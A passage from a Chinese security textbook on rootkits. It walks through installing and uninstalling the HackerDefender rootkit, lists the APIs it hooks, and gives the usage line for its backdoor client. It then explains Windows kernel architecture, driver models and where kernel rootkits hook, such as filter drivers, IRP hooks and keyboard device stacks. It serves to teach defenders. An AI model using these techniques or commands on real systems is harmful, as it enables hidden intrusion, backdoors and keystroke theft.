可以使用如下的语法从系统中删除HackerDefender: >hxdef100.exe-:uninstall 卸载后,用户将不能找到任何HxDef100程序文件的实例。 下面是来自hxdef100r目录的安装样例: C:\hxdef100r>dir 10/10/2008 10:28 AM<DIR>. 10/10/2008 10:28 AM<DIR>.. 07/20/2005 07:09 PM 26,624 bdcli100.exe 09/01/2005 11:13 AM 70,656 hxdef-OFdis.exe 07/20/2005 01:40 PM 3,924 hxdef100.2.ini 09/01/2005 11:38 AM 70,656 hxdef100.exe 07/29/2005 11:18 AM 4,119 hxdef100.ini 07/20/2005 07:09 PM 49,152 rdrbs100.exe 09/18/2005 06:57 PM 37,407 readmecz.txt 09/18/2005 06:56 PM 37,905 readmeen.txt 09/01/2005 11:23 AM 93,679 src.zip 9 File(s)394,122 bytes 2 Dir(s)42,495,737,856 bytes free 接着,你运行安装程序来安装这个应用: C:\hxdef100r>hxdef100.exe 现在所有HxDef(hxdef*)文件从系统控制台或者Windows中都不再能看到: C:\hxdef100r>dir 10/10/2008 10:28 AM<DIR>. 10/10/2008 10:28 AM<DIR>.. 07/20/2005 07:09 PM 26,624 bdcli100.exe 07/20/2005 07:09 PM 49,152 rdrbs100.exe 09/18/2005 06:57 PM 37,407 readmecz.txt 09/18/2005 06:56 PM 37,905 readmeen.txt 09/01/2005 11:23 AM 93,679 src.zip 5 File(s)244,767 bytes 2 Dir(s)0 bytes free 配置文件包含多个可以定制的列表,这样Rootkit可以提供最高级的服务。HxDef可以不修改任何配置就运行;但是,如果进行了修改,很重要的一点是即使列表没有内容,也必须有标题。每个配置文件列表都提供很好的Rootkit功能。 表3-6描述了所有配置文件列表和可接受的参数。图3-2是预先配置的hxdef100.ini配置文件样例。列表标题和默认值已经处理过(列表标题在括号内),使得搜索hxdef或者Hidden Processes这样的关键词极其困难。 挂钩的API进程 下列API进程在Rootkit安装时挂钩。HxDef通过函数钩子,从NtDll.dll执行NtEnumerateKey API的内存中DLL注入: Kernel32.ReadFile Ntdll.NtQuerySystemInformation Ntdll.NtQueryDirectoryFile Ntdll.NtVdmControl Ntdll.NtResumeThread Ntdll.NtEnumerateKey Ntdll.NtEnumerateValueKey Ntdll.NtReadVirtualMemory Ntdll.NtQueryVolumeInformationFile Ntdll.NtDeviceIoControlFile Ntdll.NtLdrLoadDll Ntdll.NtOpenProcess Ntdll.NtCreateFile Ntdll.NtLdrInitializeThunk WS2_32.recv WS2_32.WSARecv Advapi32.EnumServiceGroupW Advapi32.EnumServicesStatusExW Advapi32.EnumServicesStatusExA Advapi32.EnumServicesStatusA 图 3-2 预先配置的hxdef100.ini配置文件样例 后门 HxDef程序中包含了一个基本的后门程序。这个Rootkit挂钩了多个与通过网络服务接收封包的API函数。当入站数据请求封包等于一个预先定义的256位键值,后门将会验证这个键值和服务。完成验证后,根据hxdef100.ini中[Settings]下的设置创建一个命令shell,一般为cmd.exe。除了未挂钩的系统服务之外,服务器上所有开放的端口接收到的数据都将被重定向到这个shell。 程序bdcli100.exe是用于连接这个后门的客户端: Usage:bdcli100.ext host port password HxDef对策 HxDef很难发现并从受到侵害的机器上清除。HxDef的常见版本可以通过IcdSword查看端口屏幕发现。其他Rootkit检测工具不是总能成功地发现这个Rootkit所挂钩的API。几年以前,holy_father提供了HxDef代码的修改版本,这个版本用于销售并且命名为Silver and Gold(金银)。这些收费的版本包含了代码和对需要更好的隐蔽性或者绕开防病毒软件等特殊情况下的定制修改的支持。这些版本还没有被广泛发现,所以检测就更困难。在编写本书时所考察的一个副本是由IceSword检测出来的。 3.6 小结 本章提供了Rootkit的一个总体入门,以及多个Rootkit赖以操纵计算机系统的计算机术语和功能。本章介绍的第一类Rootkit展示了用户模式Rootkit如何在用户空间中发挥作用,以及如何使用DLL注入和进程钩子来接管系统。虽然用户模式Rootkit不是最复杂或者最有破坏力的,但是对用户的影响仍然很严重。因为Rootkit开发人员必须确保他们的Rootkit在被攻击的机器上停留更久并且过滤所有类型的进程(包括系统进程),他们开始关注于使用内核模式Rootkit来实现用户模式Rootkit的功能。这些内核模式Rootkit在恶意软件隐蔽性上更加高效,也更加难以发现。在第4章,你将学习更多关于内核Rootkit的知识。 第4章 内核模式Rootkit 内核模式Rootkit可能是最老和最广泛应用的Rootkit,对当今的计算机表现出最明显的威胁。在2007年摧毁了数十万台机器的StormWorm就具备了一个内核模式Rootkit组件(参见http://recon.cx/2008/a/pierre-marc_bureau/storm-recon.pdf)。这个组件使蠕虫能够进行更多的破坏,并在非常深的程度上(操作系统级别)感染系统。 因此,我们将花费相当多的篇幅来讨论Windows操作系统的内部结构。内核模式也就是和操作系统在同一个级别,因此内核模式Rootkit必须理解如何使用和其他内核模式组件(例如驱动程序)和操作系统相同的函数、结构和技术。为了真正地体会到这种交互并且理解内核模式Rootkit带来的威胁,你也必须理解这些OS级别的细节。但是复杂性并不是以操作系统作为起点和终点的,正如你在本章中所学习到的,许多内核模式技术依赖于复杂的底层硬件。结果是,你的PC由一个分层的技术系统组成,这些层次必须进行交互并且共存于系统之中。这个分层系统的主要组件包括处理器及其指令集、操作系统和软件。 因为内核模式Rootkit在操作系统级别上感染系统,并且依赖于与硬件的低级交互,我们也将讨论大部分PC中控制硬件的部件——x86体系结构。尽管本章仅关注x86和Windows,但是千万不要以为其他指令集和操作系统没有相同的问题。内核模式Rootkit技术也存在于Linux和OS X中。我们关注x86和Windows只是因为目前它们的数量最大,受到的破坏也最多。 本章的流程如下: ·对x86体系结构基础知识的全面讨论。 ·详细的Windows内部结构介绍。 ·Windows内核驱动程序概念及工作方式的概述。 ·内核模式Rootkit的挑战、目标和策略。 ·内核模式Rootkit的方法和技术摘要及实例。 如果你是x86/Windows专家,可以跳到4.3节。 4.1 底层:x86体系结构基础 本节将向读者介绍为了了解高级的内核模式Rootkit所必须具备的x86体系结构基础知识。指令集体系结构影响从硬件(如芯片设计)到软件(例如操作系统)的所有环节,对整体系统安全和稳定性的影响也从这个低的级别开始。 4.1.1 指令集体系结构和操作系统 x86是个人计算机上许多处理器品牌使用的一种指令集体系结构。指令集是一组命令,告诉操作系统执行哪些操作来完成一个任务。你可能没有意识到,每天你都在使用指令集,不管你拥有的是一台Mac、一台PC还是一部手机。在这个结构层次,你的处理器理解有限的命令集,这些命令代表数学运算(加、乘、除)、控制流结构(循环、跳转、条件分支)、数据操作(移动、存储、读取)以及其他基本功能。这种最小化的功能集是有意为之,因为处理器每秒可以计算数百万条指令,这些指令的组合能够形成复杂的任务,例如,进行一个视频游戏或者在遗传学软件中整合蛋白质。将这些高级任务翻译成CPU所用的简单指令和数据、并且显示在你的屏幕上的技术复杂度非常大。 操作系统在这种场合下充当了救星。在这个例子中,OS将复杂任务分解成简单的x86指令的复杂工作。OS负责协调、同步、保全和引导执行任务所必需的所有组件。这些组件包括处理与字符对应的电子信号的低级键盘驱动程序、将内容/数据保存到物理驱动器的一系列中级文件系统驱动程序和低级磁盘驱动程序,还有许多处理I/O(输入/输出,如读取和写入存储媒体)、访问权限、图形显示和字符编码及转换的Windows子系统。 CPU提供的指令集为操作系统揭示了使用计算机中的硬件所需要的机制。这些机制包括物理内存(RAM)分段和编址方式(操作系统引用内存位置的方法);用于基本运算和处理器间快速读取变量的存储的物理CPU寄存器;随着系统总线宽度增加到64位而扩展的操作模式;用于游戏和高端图形的扩展(MMX,3dNow等)以及使带有32位总线宽度的系统能够读取和翻译64位地址的物理地址扩展(PAE);虚拟化支持;还有最重要的,用于访问特权功能和资源的硬件强制保护层次。这些保护层次使操作系统通过将最高特权级别的访问限制在操作系统中来保持对系统上应用程序权限的控制。我们先来仔细地看看这个保护层次的概念。 4.1.2 保护层次 在x86体系结构中,保护层次(0~3)是CPU(由OS实现)在执行代码时实施的特权级别(见图4-1)。 因为从操作系统过程到用户应用程序的所有二进制代码,都在相同的处理器上运行,所以必须有一个机制来区分系统代码和用户代码,并相应地限制特权。OS在最高特权级别上运行,也就是Ring 0(也称为内核模式或者内核空间),而用户程序和应用程序运行于最低的特权级别Ring 3(称为用户模式或者用户空间)。 在硬件和OS中如何实施这种保护的细节以及许多x86提供但未被Windows使用的其他层次和操作模式都很复杂,在这里就不做进一步研究。现在所要理解的重要概念是CPU和OS合作实现保护层次,这些层次的存在只是为了维护安全和系统完整性。举个简单的例子,你可以将保护层次看做CPU标志中的一个位值,被设置时表示代码具有Ring 0(OS代码)特权,未被设置时表示Ring 3(用户代码)特权。补充说明一点,这个领域的研究正在焕发生机,层次保护的概念对于理解特权分离的难度变得非常关键。虚拟化技术在过去的几年急剧流行起来,因为芯片制造商争着将业界带向对虚拟化操作系统的硬件支持的方向上来。结果是,一些指令集中加入了一个新的保护层次,就是Ring-1,这个层次使系统管理程序(在大部分情况下是一个灵活的最小化宿主OS)能够监控运行于Ring 0的客户操作系统,而不是让客户操作系统运行于“真正的Ring 0”(因此客户操作系统不能使用真正的硬件,而是虚拟化的硬件)。这些新的概念也导致Rootkit技术的显著进步,产生了虚拟化的Rootkit,这是第5章的主题。 图 4-1 保护层次 4.1.3 跨越层次 保护层次的关键特性是可以使CPU根据执行中的代码的需要改变特权级别,这使较低特权的应用程序能够执行较高特权级别的代码,以便执行必要的任务。换句话说,CPU能够动态地根据需要将特权从Ring 3提升为Ring 0。这种迁移发生在一个用户模式线程直接或者由于请求对特权系统资源的访问而运行如下某项内容时: ·特殊CPU指令SYSENTER ·系统调用 ·中断或者其他安装的调用门(call gate) 这种迁移由操作系统控制并使用CPU指令集实现,在线程需要使用受限的CPU指令或者执行一个特权操作(例如直接访问硬件)时执行。在发起系统调用或者调用门时,操作系统将请求的控制权交给对应的内核组件(例如驱动程序),该组件代表提出请求的用户模式线程执行特权操作并且返回所有结果。这个操作通常导致一次或者多次线程上下文切换,因为操作系统代码换出用户代码,以完成更高特权的请求。 通常,调用门以中断的形式实现,表现为x86 CPU的INT指令,但是OS能够为特定的进程安装可以通过全局描述符表(GDT)或者局部描述符表(LDT)访问的许多调用门。这些表格存储一些内存分段描述符的地址,这些描述符指向调用门被调用时执行的预先安装的可执行代码。 系统调用的执行实例之一是当程序发出一个INT指令以及表示所发起的中断的数字参数时。发生这种情况时,操作系统处理指令,并且将控制权转给合适的被登记用于处理该中断的内核模式组件。 SYSENTER是更现代的指令,它被优化为直接从用户模式迁移为内核模式,而没有登记和处理中断的开销。 4.1.4 内核模式:数字化的西部蛮荒 简单地概括,内核模式就是处理器在执行操作系统代码(包括设备驱动程序)时所处的特权模式。用户应用程序运行于用户模式,这时处理器运行在较低的特权级别中。在这种较低的特权级别下,用户应用程序不能使用和内核代码相同的CPU指令和物理硬件。因为用户模式和内核模式程序都必须利用系统内存来运行,所以两者的内存空间从逻辑上分离,内存中的每页都用处理器使用该页所必需的相应访问模式来标识。用户模式程序在生命周期中部分时间必须在核心模式下执行各种操作(其中最多的是利用内核模式的图形程序库来进行窗口操作),因此,正如前面所讨论的,SYSENTER这样的处理器指令被用来进行迁移。操作系统使用这条指令对用户模式程序设置陷阱,在允许程序进入更高的处理器特权访问模式(也就是Ring 0)之前,对调用函数的参数进行基本的验证。 内核空间是极端多变的环境,所有执行中的代码都有相同的特权、访问权和能力。因为内存地址空间不像用户模式的进程一样是分离的,所以内核模式中的任何程序都可以访问其他任何程序(包括操作系统本身的程序)的内存、数据和堆栈。实际上,任何组件都能将自身登记为任何类型数据的处理程序——这些数据包括网络流量、击键、文件系统信息等,而不需要考虑是否需要访问这些信息。唯一的限制是:你必须“承诺”按照规则办事。如果你没有遵守规则,就会导致冲突并使整个系统崩溃。 上述情况造成了一个非常复杂和混乱的环境。任何了解基本需求和足够的C语言知识的人都是危险的,他们可以开发一个核心驱动程序,装载这个程序,然后开始在这个环境中徜徉。问题是,这里没有你的代码的运行时和控制验证——没有内建的异常处理程序来捕捉你的逻辑流向或者编码错误。如果你废弃一个空指针,就会使系统出现蓝屏错误(崩溃)。尽管Microsoft做出了很大的努力来建立内核模式体系结构的文档,为内核开发人员提供关于最佳实践的非常清晰的建议,但是这一切实际上仍然依赖于软件人员写出没有缺陷的代码。我们也知道那样的想法会将我们带向何方。 4.2 目标:Windows内核组件 现在我们已经有了混乱的内核模式环境的基础知识,可以讨论使操作系统发出嘀嗒声(就像定时炸弹)的庞大的子系统和执行组件。我们按照自上而下的方式介绍这些组件,并指出其弱点及/或内核模式Rootkit一般隐藏的位置。我们将会经常参考图4-2,该图提供了Windows内核体系结构的一个概略图。 图 4-2 Windows内核模式体系结构 4.2.1 Win32子系统 Win32子系统是Windows中的3个环境子系统之一,这3个子系统是:Win32、POSIX和OS/2(Windows XP中只有Win32)。Win32环境子系统负责在Windows执行层为用户模式应用程序和服务代理内核模式功能。这个子系统具有内核模式组件(主要是Win32k.sys)和用户模式组件(最主要是csrss.exe(客户端/服务器运行时主系统)和子系统DLL)。 子系统DLL作为必须使用一部分核心模式所提供的功能的32位程序的网关。这个功能由Windows Executive提供。尽管Win32子系统DLL不是内核模式组件,但是它们仍然是内核模式Rootkit的高价值目标。这些DLL为用户应用程序甚至系统服务进程提供入口。因此,污染这些入口将扩展Rootkit在任何用户模式应用程序上的能力。 Win32k.sys是处理用户模式的图形操作调用的内核驱动程序,实现于图形设备接口(GDI)之中。这个驱动程序处理用户体验的核心,如菜单、绘制窗口、鼠标和键盘图形,以及屏幕特效。外部图形驱动程序也可以看做Win32子系统的一部分。 4.2.2 这些API究竟是什么 Windows有两种主要的API类型:Win32 API主要由用户模式程序使用,原生(Native)API由内核模式程序使用。这种分类的结果是,大部分Win32API只是调用原生API的存根(stub,在调用实际函数之前检查参数的小型二进制程序),其中一些API依次调用Windows内核中埋藏的未在文档中列出的内部函数。 Win32 API在前面提到的4个主要Win32子系统DLL中实现: ·kernel32.dll 为访问文件系统、设备、创建线程和进程以及内存管理提供基本服务。 ·advapi32.dll 为操纵Windows组件(如注册表和用户账户)提供高级服务。 ·user32.dll 实现窗口和图形结构,如按钮、鼠标指针等。 ·gdi32.dll 提供显示器和输出设备的访问。 这些DLL中的某些函数在DLL中直接以用户模式实现。但是,这些函数的重要部分需要访问内核模式中Windows Executive内部的服务,基本文件输入/输出(I/O)(如Win32 API函数ReadFile()和WriteFile())就是其中一个例子。因此,当用户模式应用程序调用kernel32.dll中的ReadFile()时,ReadFile()实际调用另一个函数NtReadFile(),这个函数从内核模式的IO管理器中输出。每当应用程序需要使用任何子系统DLL中的函数时,Windows装入程序将会动态地将这些程序库输入到应用程序的地址空间中。 正如前面提到的,这些DLL常常成为Rootkit的目标,这是因为这些DLL为用户模式应用程序揭示的核心功能。通过挂钩和破坏这些DLL或者实现DLL所揭示的功能的内核模式,Rootkit马上在系统上得到一个牢固的立足点。 4.2.3 守门人:NTDLL.DLL 如果子系统DLL是进入内核空间的入口,那么NTDLL.DLL就是它们到达内核空间之前必须首先经过的桥梁。这个DLL为从用户模式调用系统服务以及Windows组件所使用的未归档的支持函数提供了一个小的存根程序。每个从用户模式到内核模式的函数调用都必须通过NTDLL.DLL,所调用的存根执行以下这几个基本任务: ·验证所有传入缓冲或者参数。 ·查找并且调用Executive中对应的系统服务函数。 ·通过发出SYSENTER或者其他体系结构专用指令迁移到内核模式。 和子系统DLL一样,这个DLL也是内核模式Rootkit挂钩和隐藏的地方。 4.2.4 委员会功能:Windows Executive(NTOSKRNL.EXE) Windows Executive存在于文件ntoskrnl.exe中,实现NTDLL.DLL输出的函数。这些函数通常被叫作系统服务,也是系统服务调度表(SSDT)指向的入口。SSDT是恶意软件/Rootkit和合法的安全产品最经常插入以控制程序执行流程的位置。 Executive实际上由实现各种系统服务核心的许多子组件构成。这些子组件包括配置管理器、电源管理器、I/O管理器、即插即用管理器以及许多其他组件。所有这些组件可以从用户模式非直接地通过Win32 API以及直接地从内核模式通过以Rtl、Mm、Ps等开始的API函数访问。 Executive也是设备驱动程序与用户模式的接口。Executive输出大量只有驱动程序能够调用的函数。这些函数被统称为Windows原生API。 接下来要描述的内核包含了大量未写入文档的特性和函数,为内核模式Rootkit所利用。 4.2.5 Windows内核(NTOSKRNL.EXE) NTOSKRNL.EXE的第二个主要部分是Windows实际上的内核。这个内核负责管理系统资源并调度使用这些资源的线程。为了调度和功能性,内核揭示了一些函数和数据结构,例如内核程序所使用的同步原语。内核还通过硬件抽象层(HAL)与硬件接口并且使用汇编代码执行特殊的与体系结构相关的CPU指令。 内核本身输出一组函数供其他内核程序使用。这些函数以Ke开始,并且记入Windows驱动程序开发包(DDK)的文档中。内核的另一个任务是为驱动程序抽象一些低级硬件。 这些内核提供的函数帮助驱动程序更简单地完成任务,但是它们也帮助Rootkit作者编写驱动程序来利用系统。事实很简单,Windows内核是有意暴露的,意图是帮助硬件制造商和软件开发人员扩展操作系统的功能与特性。尽管内核在某种程度上与Windows Executive和未写入文档的内部数据机构和例程隔绝而受到保护,但是仍然在很大程度上暴露给了其他内核组件,包括Rootkit。 4.2.6 设备驱动程序 设备驱动程序存在的首要原因是通过HAL与物理硬件设备接口。一个简单的例子是从设备读取并且翻译键盘扫描码,并且将其转换为操作系统所用的数据结构或者事件的键盘驱动程序。设备驱动程序有许多种风格,但是一般使用C语言或者汇编语言编写,具有.sys或者.ocx扩展名。一个可装入的内核模块也相似,但是一般仅包含支持例程(而不是核心功能),在驱动程序输出的一个DLL中实现。 但是,除了运行硬件的任务之外,设备驱动程序因为各种原因也被用来访问内核模式组件和操作系统数据结构。这是设备驱动程序的合法用途,Windows包含了许多这样的驱动程序。这意味着许多驱动程序并不对应任何的物理设备。 设备驱动程序是Windows操作系统体系结构中的独特组件,因为它们具有直接与硬件交流或者使用内核和Windows Executive输出的函数的功能。注意图4-2中,驱动程序并不位于内核甚至HAL之上,而是与之相邻。这意味着它们具有相同的地位,与同硬件交互的那些组件之间很少甚至没有依赖关系。虽然驱动程序可以选择将Executive用于像内存映射(将虚拟地址转换为物理地址)以及I/O处理这样的任务,使用内核来进行线程上下文切换,但是也可以在自己的例程中实现这些功能并且将这些功能输出到用户模式。 这种极度的灵活性对系统既是增强也是威胁。虽然它使Windows非常灵活并且“可插入”,也使系统处于有缺陷和恶意的驱动程序的威胁之下。 4.2.7 Windows硬件抽象层(HAL) 内核(NTOSKRNL.EXE)与影响系统性能(如缓冲和多处理器环境)的指令集体系结构的可移植性和细微差别也有很大关系。HAL负责实现处理这些不同配置和体系结构的代码。HAL包含在hal.dll文件中,这个文件在系统启动期间装入内核时由NTOSKRNL.EXE输入。因为Windows内核设计为支持多种平台,在启动时根据检测到的平台(PC、嵌入式设备等)选择合适的HAL类型和参数。 当今的内核Rootkit很少对付HAL,因为这要花费许多不必要的精力,内核中有许多其他更容易藏身的位置。 4.3 内核驱动程序概念 本节将介绍驱动程序、驱动程序类型、Windows驱动程序模型和框架,以及驱动程序满足系统可用性的各种需求的细节。这些主题对于理解内核模式Rootkit和体会它们运用系统的能力是很关键的。在我们介绍驱动程序框架细节时,将指出经常被Rootkit作者侵害的领域。 尽管我们将介绍内核驱动程序的基本组件,但是不会提供样例代码。源代码和编写内核驱动程序的细节请参考附录。 警告:重要的提醒和警告:本节的意图不是为了欺骗读者考虑开始载入定制的设备驱动程序。你在开发驱动程序时必须考虑数百种细微的差别、附加条款和假设问题。在编写或者载入驱动程序(尤其是在生产系统上)之前请参考Windows驱动程序开发包文档中的必要前提。 4.3.1 内核模式驱动程序体系结构 到Windows Vista出现之时,Windows驱动程序可以在用户模式或者内核模式下操作。用户模式驱动程序一般是不需要低级操作系统特性的打印机驱动程序。而内核模式驱动程序与Windows Executive交互,以获得控制设备的I/O管理和其他功能。 所有Windows驱动程序都必须遵循一种驱动程序模型,并且提供标准的驱动程序例程。一些驱动程序还实现Windows驱动程序模型(WDM),这是在WDM文档中定义的一个标准规则和例程集合。这种模型要求驱动程序为电源管理、即插即用和其他特性提供例程。我们不详细介绍各种类型的WDM驱动程序,这些驱动程序分为总线驱动程序、功能驱动程序和过滤器驱动程序。 总线驱动程序为一个总线控制器或者适配器提供服务,并且枚举连接的设备(思考一下在你的计算机上的许多USB端口上连接了多少设备)。它们为高级驱动程序提供电源操作和插入/删除警告。功能驱动程序是总线驱动程序的上一层,处理总线上特定设备的操作(如读/写)。功能驱动程序的子类型包括类、小类、端口和小端口。最后,过滤器驱动程序是可以插入到总线驱动程序之上的任何级别的特殊驱动程序,用于过滤特定的I/O请求。 这些总线驱动程序、功能驱动程序和过滤器驱动程序是分层的(也被称为链式或者栈式)。分层体系结构的背景思路是抽象:每种驱动程序随着堆栈的遍历而移除底层硬件的复杂性。最低级的驱动程序处理固件并且直接与硬件通信,但是只把必要的和请求信息上传给较高级别的驱动程序,在驱动程序链中有3种类型的驱动程序: ·最高级别的驱动程序,例如文件系统驱动程序。 ·中级驱动程序,如WDM类驱动程序或者过滤器驱动程序。 ·最低级别的驱动程序,如WDM总线驱动程序。 为了阐述这种体系结构,考虑一下你的计算机上的硬盘。假设它通过一个SCSI连接器插入到主板上。板载的连接器总线由一个最低级的总线驱动程序来实现,这个驱动程序用于响应硬盘中的硬件事件——如电源开/关、睡眠/唤醒等。总线驱动程序还将其他任务传递给驱动程序堆栈的上层——中级驱动程序,由其处理磁盘读/写和其他设备相关的功能(因为一个SCSI总线可以运行多种设备)。你的系统也可能包含了用于磁盘加密的中级过滤器驱动程序,以及用于定义文件系统(例如NTFS)的更高级的驱动程序。 Rootkit很少作为最低级的驱动程序(也就是总线驱动程序),因为低级驱动程序处理特定制造商的硬件的细节,开发和测试这样的驱动程序极其复杂并且是资源密集的(需要大量的人力、时间和资金)。为了开发可靠的最低级驱动程序,你需要一个成熟的、具有资金支持和非常有针对性的目标。而且,一些最低级的总线驱动程序(如系统提供的SCSI和视频端口驱动程序)不能替换,因为操作系统不允许这么做,而且修改过的版本不能工作。Rootkit更可能作为中级或者高级驱动程序来感染系统,因为这么做所需要的努力和回报之间的比例较为合适。 这种分层的设计有助于内核Rootkit的利用。专门的Rootkit作者可以根据喜好编写一个在驱动程序链中任意位置的驱动程序,修改传输到任何上层或者下层驱动程序的数据。扩展我们的硬盘的例子,想象一下,如果Rootkit作者编写一个过滤器驱动程序来拦截数据,并且在数据被中级的加密过滤器驱动程序加密之前进行修改。因为过滤器驱动程序可以插入到任何级别(低、中或者高)中,Rootkit可以在数据被加密之前读取到并且将数据通过网络传输。因此,Rootkit可以在数据离开加密过滤器驱动程序之后修改加密的数据,在加密数据内部存储额外的信息。 由于分层复杂性而常常被Rootkit作者利用的另一类驱动程序是网络驱动程序。网络驱动程序有各种网络交互标准如OSI模型(例如,TCP/IP协议栈)的附加开销。因此,有另外两种类型的驱动程序:一种称作协议驱动程序:位于驱动程序堆栈的最高级驱动程序之上;另一种是过滤器钩子驱动程序,允许程序过滤封包。Microsoft开发的网络设备接口标准(NDIS)使网络驱动程序开发人员能够很容易实现具有OSI参考模型的较高级别层次的低级NIC驱动程序。NDIS之上的传输驱动程序接口(TDI)实现OSI传输层。 NDIS和TDI为Rootkit提供了安装定制协议栈的机会,例如,未向任何Windows Executive组件注册的TCP/IP协议栈。它们还使Rootkit作者有机会在现有的驱动程序堆栈中插入过滤器和过滤器钩子驱动程序,在中间级别嗅探(并且在此过程中修改)网络封包。 4.3.2 整体解剖:框架驱动程序 用于开发驱动程序的工具并不特殊。驱动程序一般以C或C++语言编写,使用Windows驱动程序开发工具包(DDK)编译器和链接程序编译。虽然这种构建环境是基于命令行的,但是也可以在Visual Studio及其他IDE中开发驱动程序,只要这些IDE配置为使用DDK构建环境编译驱动程序就可以了。驱动程序应该根据是否为WDM驱动程序包括标准的头文件ntddk.h或者wdm.h。构建环境有两种风格:checked build(用于调试)和free build(用于发行)。 驱动程序要正常装入,必须包含必要的驱动程序例程。必要的例程根据所使用的驱动程序模型(我们假设为WDM)而有所不同,但是所有驱动程序都必须包括: ·DriverEntry() 初始化驱动程序和使用的数据结构;这个函数在驱动程序装入时由操作系统自动调用。 ·AddDevice() 将驱动程序连接到系统中的设备;驱动程序可以是物理实体或者虚拟实体,例如,键盘或者逻辑卷。 ·调度进程 处理I/O请求包(IRPs),这是定义Windows中I/O模型的底层数据结构。 ·Unload() 在驱动程序卸载及释放系统资源时调用。 根据需要,驱动程序可以选择包含和扩展许多其他的系统定义的例程,这取决于驱动程序预期提供服务的设备类型,以及该驱动程序在驱动程序链中插入的位置。 这些必要的例程都代表了Rootkit接管内核模式中的其他驱动程序的一个领域。使用AddDevice(),Rootkit可以连接到现有的驱动程序堆栈——这是过滤器驱动程序连接到一个设备的主要方法。调度例程在驱动程序从较低或者较高级别的驱动程序接收IRP时调用,处理IRP中的数据。IRP钩子通过覆盖驱动程序调度例程的功能代码,使其指向Rootkit的调度例程。这有效地将所有用于原始驱动程序的IRP重定向到Rootkit驱动程序。 驱动程序也依赖于标准的Windows数据结构来进行一些有意义的工作。所有驱动程序必须处理3种关键结构,这些也可能和Rootkit有关: ·I/O请求包(IRP) 所有I/O请求(例如,键盘、鼠标和磁盘操作)由操作系统(具体地说是Windows Executive中的I/O管理器)创建的IRP数据结构表示。IRP是一个包含请求代码、指向用户缓冲区的指针、指向内核缓冲区的指针,以及许多其他参数的字段的整体结构。 ·DRIVER_OBJECT 包含了I/O管理器为发送IRP给驱动程序所必须知道的函数入口点地址表。这个数据结构由驱动程序本身的DriverEntry()函数填写。 ·DEVICE_OBJECT 一个设备(例如键盘、鼠标、硬盘,甚至不表现物理硬件的虚拟设备)由一个或者多个DEVICE_OBJECT结构表示,这些结构被组织为设备栈。当为一个设备创建IRP时(按下一个键或者初始化一个文件读取操作),OS将IRP发送给设备栈中的第一个驱动程序。每个在设备栈中登记了设备的驱动程序都有机会在传递IRP或者完成IRP之前对其进行某些操作。 这些数据结构都代表着内核模式Rootkit的一个目标。无疑,I/O管理器因为管理这些数据结构也变成了一个目标。击键记录程序Rootkit常用的一种技术是创建一个DEVICE_OBJECT,并且将其连接到操作系统的键盘设备栈。现在Rootkit驱动程序被注册为处理键盘设备的IRP,它将接收键盘I/O管理器创建的每个IRP。例如,这意味着Rootkit有机会检查这些封包,并且将其复制到一个日志文件中。相同技术也可以应用到网络和硬盘设备栈。 4.3.3 WDF、KMDF和UMDF WDM不是Windows支持的唯一驱动程序模型。实际上,Microsoft建议老练的驱动程序开发人员移植到最近重新设计的内核驱动程序框架,这种框架被恰当地命名为Windows驱动程序基础(WDF)。WDF是Microsoft作为“下一代驱动程序模型”推出的,由两个子框架组成:内核模式驱动程序框架(KMDF)和用户模式驱动程序框架(UMDF)。 推动这一内核驱动程序体系结构重设计的目标是,抽象驱动程序开发的某些低级细节,使开发人员更容易编写持久而稳定的内核代码。简而言之,每个框架程序库中提供的API和接口比传统的WDM更容易使用,需要的必备服务例程也更少。KMDF通过封装WDM来做到这一点。UMDF是Microsoft开始将不必要的驱动程序从内核模式移出到用户模式的一次尝试,这些驱动设备包括相机、便携音乐播放器和嵌入式设备。 在本书写作的时候,这些新的框架还没有暴露出Rootkit作者可以利用的新设计缺陷。但是,时间通常会改变这种结论。 4.4 内核模式Rootkit 我们已经足够详细地介绍了x86指令集、Windows体系结构和驱动程序框架,现在我们来对付手上的实际问题:内核模式Rootkit。在本节中,我们将讨论Rootkit用于侵入和破坏Windows内核的著名技术。虽然一些技术包含了不胜枚举的组合(例如钩子),但是大部分流行的技术可以归纳为几种标准的技巧。 4.4.1 内核模式Rootkit简介 内核模式Rootkit就是运行于操作系统实现的CPU的最高特权级别(也就是Ring 0)的恶意二进制代码。正如用户模式中的Rootkit必须有可执行的二进制代码,内核模式中的Rootkit也必须有二进制程序。这可以是可装入的内核模块(DLL)或者设备驱动程序(sys)的形式,可以直接由装入程序装入或者由操作系统以某种方式调用(例如,可以注册为处理一个中断或者插入文件系统的一个驱动程序链)。一旦驱动程序装入,Rootkit处于内核空间,可以开始更改操作系统功能以稳固地存在于系统上。 大部分内核模式Rootkit都具有使其难以捕捉和删除的某些特性。这包括: ·隐蔽性 因为获得内核模式访问权可能很困难,作者一般对于隐身都有足够的认识。而且,因为许多防病毒软件、主机入侵检测(HIDS)、主机入侵防御系统(HIPS)以及防火墙产品都严密地监控内核模式,Rootkit必须小心,以避免触发警报或者留下明显的痕迹。 ·持续性 编写Rootkit的综合目标之一是获得在系统上的持续存在。否则,没有必要经历艰苦的内核驱动程序编写过程。因此,内核模式Rootkit一般经过精心地思考并且包含一些特性或者特性组合,通过使用多种技术复制其立足点,确保Rootkit能够在重启甚至被发现和清除之后存活下来。 ·简洁性 内核模式Rootkit使用高级技术在操作系统级别破坏用户计算机的完整性。这不仅对系统稳定性不利(用户可能经历频繁的崩溃或者性能影响),而且删除感染及将系统恢复为正常操作也非常困难。 4.4.2 内核模式Rootkit所面对的挑战 Rootkit作者面对一些和合法的内核驱动程序开发人员相同的软件开发问题: ·内核模式本质上没有错误处理系统;逻辑错误将造成蓝屏并使系统崩溃。 ·因为内核驱动程序更接近于硬件,内核模式中的操作更容易引起移植性问题,例如,操作系统版本/构建、底层硬件和体系结构(PAE,非PAE,x64等)。 ·其他驱动程序争用相同资源可能导致系统不稳定。 ·内核空间不可预测和多变的特性,以及多样性要求广泛的测试。 除了合法的开发问题,Rootkit作者必须在装入驱动程序和保持隐藏上具有创造力,本质上: ·他们必须找到一个装入的方式; ·他们必须找到一个执行的方式; ·他们必须按照保持隐蔽和确保持续性的方式进行。 这些挑战在用户空间中不存在,因为整个操作系统是围绕持续的用户模式以及避免其崩溃来构建的。 4.4.3 装入 我们已经阐述了驱动程序由I/O管理器装入后,如何侵害内核模式的驱动程序体系结构,但是首先是驱动程序如何进入内核?这个问题有很多有趣的答案,也充满了各种各样的可能性。 